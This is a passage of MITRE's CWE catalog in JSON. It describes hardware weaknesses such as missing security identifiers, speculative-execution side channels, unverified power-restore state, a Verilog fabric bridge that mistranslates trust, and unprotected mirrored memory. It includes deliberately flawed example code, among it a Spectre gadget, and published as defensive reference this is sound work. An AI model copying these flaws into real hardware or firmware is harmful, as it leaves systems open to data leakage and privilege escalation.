improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1302":{"attr":{"@_ID":"1302","@_Name":"Missing Security Identifier","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute). A typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity) in addition to much more information in the message. Sometimes the transactions are qualified with a Security Identifier.  This Security Identifier helps the destination agent decide on the set of allowed or disallowed actions.","A common weakness that can exist in such transaction schemes is that the source agent fails to include the necessary, security identifier with the transaction.  Because of the missing security identifier, the destination agent might drop the message, thus resulting in Denial-of-Service (DoS), or get confused in its attempt to execute the given action, which confusion could result in privilege escalation or a gain of unintended access."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Transaction details must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Security identifier definition and programming flow must be tested in pre-silicon and post-silicon testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing AES key for encryption or decryption. The key is of 128 bits implemented as a set of four 32-bit registers.  The key registers are assets, and the register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.","The access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a security identifier. There could be a maximum of 32 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows for a respective action from an agent whose identity matches the number of the bit; if set to \u201c0\u201d (i.e., Clear), it disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000004 \u2013 agent with Security Identifier \u201c2\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}},{"attr":{"@_Nature":"good"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000002 \u2013 agent with security identifier \u201c2\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}}],"Body_Text":["The originator sends a transaction with no security identifier, i.e., meaning the value is \u201c0\u201d or NULL. The AES-Key-access register does not allow the necessary action and drops the transaction because the originator failed to include the required security identifier.","The originator should send a transaction with Security Identifier \u201c2\u201d which will allow access to the AES-Key-access register and allow encryption and decryption operations."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-14"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1303":{"attr":{"@_ID":"1303","@_Name":"Non-Transparent Sharing of Microarchitectural Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts.","Extended_Description":{"xhtml:p":["Modern processors use techniques such as out-of-order execution, speculation, prefetching, data forwarding, and caching to increase performance. Details about the implementation of these techniques are hidden from the programmer\u2019s view. This is problematic when the hardware implementation of these techniques results in resources being shared across supposedly isolated contexts. Contention for shared resources between different contexts opens covert channels that allow malicious programs executing in one context to recover information from another context.","Some examples of shared micro-architectural resources that have been used to leak information between contexts are caches, branch prediction logic, and load or store buffers. Speculative and out-of-order execution provides an attacker with increased control over which data is leaked through the covert channel.","If the extent of resource sharing between contexts in the design microarchitecture is undocumented, it is extremely difficult to ensure system assets are protected against disclosure."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1189","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"Microarchitectural side-channels have been used to leak specific information such as cryptographic keys, and Address Space Layout Randomization (ALSR) offsets as well as arbitrary memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers."},{"Phase":"Requirements","Description":"Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Secure programs perform bounds checking before accessing an array if the source of the array index is provided by an untrusted source such as user input. In the code below, data from array1 will not be accessed if x is out of bounds. However, if this code executes on a processor that performs speculative execution the outcome of the if statement could be mis-predicted and the access on the next line will occur with a value of x that can point to arbitrary locations in the program\u2019s memory (out-of-bounds).","Even though the processor rolls back the architectural effects of the mis-predicted branch, the memory accesses alter data cache state, which is not rolled back after the branch is resolved. The cache state can reveal array1[x] thereby providing a mechanism to recover any word in this program\u2019s memory space."]},"Example_Code":{"#text":"if (x &lt; array1_size)\\n    \\t\\t\\t\\t\\t\\ty = array2[array1[x] * 4096];","attr":{"@_Nature":"bad"}},"Body_Text":"Code snippet is from the Spectre paper: https://spectreattack.com/spectre.pdf."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"663"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1121"}},{"attr":{"@_External_Reference_ID":"REF-1122"}},{"attr":{"@_External_Reference_ID":"REF-1123"}},{"attr":{"@_External_Reference_ID":"REF-1124"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"}}},"1304":{"attr":{"@_ID":"1304","@_Name":"Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product performs a power save/restore\\n            operation, but it does not ensure that the integrity of\\n            the configuration state is maintained and/or verified between\\n\\t    the beginning and ending of the operation.","Extended_Description":{"xhtml:p":"Before powering down, the Intellectual\\n                Property (IP) saves current state (S) to persistent\\n                storage such as flash or always-on memory in order to\\n                optimize the restore operation.  During this process,\\n                an attacker with access to the persistent storage may\\n                alter (S) to a configuration that could potentially\\n                modify privileges, disable protections, and/or cause\\n                damage to the hardware. If the IP does not validate\\n                the configuration state stored in persistent memory,\\n                upon regaining power or becoming operational again,\\n                the IP could be compromised through the activation of\\n                an unwanted/harmful configuration."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"345","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1271","@_View_ID":"1194"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Weakness introduced via missing internal integrity guarantees during power save/restore"},{"Phase":"Integration","Note":"Weakness introduced via missing external integrity verification during power save/restore"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["DoS: Instability","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Alter Execution Logic","Quality Degradation","Unexpected State","Reduce Maintainability","Reduce Performance","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Inside the IP, incorporate integrity checking\\n                        on the configuration state via a cryptographic\\n                        hash. The hash can be protected inside the IP such as\\n                        by storing it in internal registers which never lose\\n                        power. Before powering down, the IP performs a hash of\\n                        the configuration and saves it in these persistent\\n                        registers. Upon restore, the IP performs a hash of the\\n                        saved configuration and compares it with the\\n                        saved hash. If they do not match, then the IP should\\n                        not trust the configuration."},{"Phase":"Integration","Description":"Outside the IP, incorporate integrity checking\\n                        of the configuration state via a trusted agent. Before\\n                        powering down, the trusted agent performs a hash of the\\n                        configuration and saves the hash in persistent storage.\\n                        Upon restore, the IP requests the trusted agent\\n                        validate its current configuration. If the\\n                        configuration hash is invalid, then the IP should not\\n                        trust the configuration."},{"Phase":"Integration","Description":"Outside the IP, incorporate a protected\\n                        environment that prevents undetected modification of\\n                        the configuration state by untrusted agents. Before\\n                        powering down, a trusted agent saves the IP\u2019s\\n                        configuration state in this protected location that\\n                        only it is privileged to. Upon restore, the trusted\\n                        agent loads the saved state into the IP."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following pseudo code demonstrates the\\n                        power save/restore workflow which may lead to weakness\\n                        through a lack of validation of the config state after\\n                        restore.","Example_Code":[{"#text":"void save_config_state(){}void restore_config_state(){}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"void* cfg;cfg = get_config_state();save_config_state(cfg);go_to_sleep();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]},{"#text":"void* cfg;cfg = get_config_file();load_config_file(cfg);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}]},{"#text":"void save_config_state(){}void restore_config_state(){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"void* cfg;void* sha;cfg = get_config_state();save_config_state(cfg);// save hash(cfg) to trusted locationsha = get_hash_of_config_state(cfg);save_hash(sha);go_to_sleep();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","",""]},{"#text":"void* cfg;void* sha_1, sha_2;cfg = get_config_file();// restore hash of config from trusted memorysha_1 = get_persisted_sha_value();sha_2 = get_hash_of_config_state(cfg);if (sha_1 != sha_2)load_config_file(cfg);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"#text":"assert_error_and_halt();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}]}],"Body_Text":["The following pseudo-code is the proper workflow for the integrity checking mitigation:","It must be noted that in the previous example of\\n                        good pseudo code, the memory (where the hash of the\\n                        config state is stored) must be trustworthy while the\\n                        hardware is between the power save and restore states."]}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"176"}}},"Content_History":{"Submission":{"Submission_Organization":"Accellera Systems Initiative","Submission_Date":"2020-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1310":{"attr":{"@_ID":"1310","@_Name":"Missing Ability to Patch ROM Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state.","Extended_Description":{"xhtml:p":["A System or System-on-Chip (SoC) that implements a boot process utilizing security mechanisms such as Root-of-Trust (RoT) typically starts by executing code from a Read-only-Memory (ROM) component. The code in ROM is immutable, hence any security vulnerabilities discovered in the ROM code can never be fixed for the systems that are already in use.","A common weakness is that the ROM does not have the ability to patch if security vulnerabilities are uncovered after the system gets shipped.  This leaves the system in a vulnerable state where an adversary can compromise the SoC."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1329","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1277","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This issue could be introduced during hardware architecture and design and can be identified later during Testing."},{"Phase":"Implementation","Note":"This issue could be introduced during implementation and can be identified later during Testing."},{"Phase":"Integration","Note":"This issue could be introduced during integration and can be identified later during Testing."},{"Phase":"Manufacturing","Note":"This issue could be introduced during manufacturing and can be identified later during Testing."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Reduce Maintainability"],"Likelihood":"High","Note":"A consequence of this is that the system is unable to be patched and leaves it in a vulnerable state."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["1. Secure patch support to allow ROM code to be patched at next boot.","2. Support patches that can be programmed in-field or during manufacturing through hardware fuses. This feature can be used to do limited patching of device after shipping or for next batch of silicon devices manufactured without changing the full device ROM."]}},"Effectiveness":"Moderate","Effectiveness_Notes":"Some part of the hardware initialization or signature verification done to authenticate patches will always be \\"not patchable.\\"  Hardware-fuse-based patches will also have limitations in terms of size and the number of patches that can be supported."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-146"},"Intro_Text":{"xhtml:p":"A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch."},"Body_Text":"ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1121"}},{"attr":{"@_External_Reference_ID":"REF-1122"}},{"attr":{"@_External_Reference_ID":"REF-1123"}},{"attr":{"@_External_Reference_ID":"REF-1124"}}]},"Content_History":{"Submission":{"Submission_Name":"Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}]}},"1311":{"attr":{"@_ID":"1311","@_Name":"Improper Translation of Security Attributes by Fabric Bridge","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another.","Extended_Description":{"xhtml:p":["A bridge allows IP blocks supporting different fabric protocols to be integrated into the system.  Fabric end-points or interfaces usually have dedicated signals to transport security attributes. For example, HPROT signals in AHB, AxPROT signals in AXI, and MReqInfo and SRespInfo signals in OCP.","The values on these signals are used to indicate the security attributes of the transaction. These include the immutable hardware identity of the controller initiating the transaction, privilege level, and type of transaction (e.g., read/write, cacheable/non-cacheable, posted/non-posted).","A weakness can arise if the bridge IP block, which translates the signals from the protocol used in the IP block endpoint to the protocol used by the central bus, does not properly translate the security attributes. As a result, the identity of the initiator could be translated from untrusted to trusted or vice-versa. This could result in access-control bypass, privilege escalation, or denial of service."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Modify Memory","Read Memory","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The translation must map signals in such a way that untrusted agents cannot map to trusted agents or vice-versa."},{"Phase":"Implementation","Description":"Ensure that the translation maps signals in such a way that untrusted agents cannot map to trusted agents or vice-versa."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["The bridge interfaces between OCP and AHB end points. OCP uses MReqInfo signal to indicate security attributes, whereas AHB uses HPROT signal to indicate the security attributes. The width of MReqInfo can be customized as needed. In this example, MReqInfo is 5-bits wide and carries the privilege level of the OCP controller.","The values 5\u2019h11, 5\u2019h10, 5\u2019h0F, 5\u2019h0D, 5\u2019h0C, 5\u2019h0B, 5\u2019h09, 5\u2019h08, 5\u2019h04, and 5\u2019h02 in MReqInfo indicate that the request is coming from a privileged state of the OCP bus controller. Values 5\u2019h1F, 5\u2019h0E, and 5\u2019h00 indicate untrusted, privilege state.","Though HPROT is a 5-bit signal, we only consider the lower, two bits in this example. HPROT values 2\u2019b00 and 2\u2019b10 are considered trusted, and 2\u2019b01 and 2\u2019b11 are considered untrusted.","The OCP2AHB bridge is expected to translate trusted identities on the controller side to trusted identities on the responder side.  Similarly, it is expected to translate untrusted identities on the controller side to untrusted identities on the responder side."]},"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module ocp2ahb(ahb_hprot,ocp_mreqinfo);output [1:0] ahb_hprot;        // output is 2 bit signal for AHB HPROTinput [4:0] ocp_mreqinfo;      // input is 5 bit signal from OCP MReqInfowire [6:0] p0_mreqinfo_o_temp; // OCP signal that transmits hardware identity of bus controllerwire y;reg [1:0] ahb_hprot;// hardware identity of bus controller is in bits 5:1 of p0_mreqinfo_o_temp signalassign p0_mreqinfo_o_temp[6:0] = {1\'b0, ahb_hprot[4:0], y};always @*begincase (p0_mreqinfo_o_temp[4:2])000: ahb_hprot = 2\'b11;    // OCP MReqInfo to AHB HPROT mapping001: ahb_hprot = 2\'b00;010: ahb_hprot = 2\'b00;011: ahb_hprot = 2\'b01;100: ahb_hprot = 2\'b00;101: ahb_hprot = 2\'b00;110: ahb_hprot = 2\'b10;111: ahb_hprot = 2\'b00;endcaseendendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},"Body_Text":"Logic in the case statement only checks for MReqInfo bits 4:2, i.e., hardware-identity bits 3:1. When ocp_mreqinfo is 5\u2019h1F or 5\u2019h0E, p0_mreqinfo_o_temp[2] will be 1. As a result, untrusted IDs from OCP 5\u2019h1F and 5\u2019h0E get translated to trusted ahb_hprot values 2\u2019b00."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"233"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-24"}}},"1312":{"attr":{"@_ID":"1312","@_Name":"Missing Protection for Mirrored Regions in On-Chip Fabric Firewall","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions.","Extended_Description":{"xhtml:p":"Few fabrics mirror memory and address ranges, where mirrored regions contain copies of the original data. This redundancy is used to achieve fault tolerance. Whatever protections the fabric firewall implements for the original region should also apply to the mirrored regions. If not, an attacker could bypass existing read/write protections by reading from/writing to the mirrored regions to leak or corrupt the original data."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1251","@_View_ID":"1194"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Modify Memory","Read Memory","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Dynamic Analysis","Description":"Using an external debugger, send write transactions to mirrored regions to test if original, write-protected regions are modified. Similarly, send read transactions to mirrored regions to test if the original, read-protected signals can be read.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The fabric firewall should apply the same protections as the original region to the mirrored regions."},{"Phase":"Implementation","Description":"The fabric firewall should apply the same protections as the original region to the mirrored regions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A memory-controller IP block is connected to the on-chip fabric in a System on Chip (SoC).  The memory controller is configured to divide the memory into four parts: one original and three mirrored regions inside the memory. The upper two bits of the address indicate which region is being addressed. 00 indicates the original region and 01, 10, and 11 are used to address the mirrored regions. All four regions operate in a lock-step manner and are always synchronized. The firewall in the on-chip fabric is programmed to protect the assets in the memory.","Body_Text":["The firewall only protects the original range but not the mirrored regions.","The attacker (as an unprivileged user) sends a write transaction to the mirrored region. The mirrored region has an address with the upper two bits set to \u201c10\u201d and the remaining bits of the address pointing to an asset. The firewall does not block this write transaction. Once the write is successful, contents in the protected-memory region are also updated. Thus, the attacker can bypass existing, memory protections.","Firewall should protect mirrored regions."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1134"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-01"}}},"1313":{"attr":{"@_ID":"1313","@_Name":"Hardware Allows Activation of Test or Debug Logic at Runtime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary.","Extended_Description":{"xhtml:p":"An adversary can take advantage of test or debug logic that is made accessible through the hardware during normal operation to modify the intended behavior of the system. For example, an accessible Test/debug mode may allow read/write access to any system data. Using error injection (a common test/debug feature) during a transmit/receive operation on a bus, data may be modified to produce an unintended message. Similarly, confidentiality could be compromised by such features allowing access to secrets."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."},{"Phase":"Integration","Note":"Such issues could be introduced during integration and identified later during Testing or System configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","DoS: Instability","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Alter Execution Logic","Quality Degradation","Unexpected State","Reduce Performance","Reduce Reliability"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."},{"Phase":"Implementation","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."},{"Phase":"Integration","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"121"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Brent Sherman","Submission_Organization":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Date":"2020-08-06"}}},"1314":{"attr":{"@_ID":"1314","@_Name":"Missing Write Protection for Parametric Data Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.","Extended_Description":{"xhtml:p":["Various sensors are used by hardware to detect any devices operating outside of the design limits. The threshold limit values are set by hardware fuses or trusted software such as the BIOS. These limits may be related to thermal, power, voltage, current, and frequency. Hardware mechanisms may be used to protect against alteration of the threshold limit values by untrusted software.","The limit values are generally programmed in standard units for the type of value being read. However, the 